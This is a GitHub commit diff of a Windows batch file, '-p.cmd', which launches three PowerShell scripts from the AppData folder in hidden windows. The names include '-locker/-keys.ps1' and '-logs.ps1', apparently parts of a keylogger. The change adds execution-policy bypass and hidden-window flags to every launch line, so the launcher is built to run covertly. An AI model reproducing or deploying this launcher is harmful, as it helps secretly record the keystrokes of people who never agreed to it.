Update -p.cmd

This commit is contained in:
I-Am-Jakoby 2022-12-27 00:00:37 -06:00 committed by GitHub
parent d42311b22c
commit 44af1ef445
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,4 +1,4 @@
@echo off
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1"
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1"
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1"
powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1"
powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1"
powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1"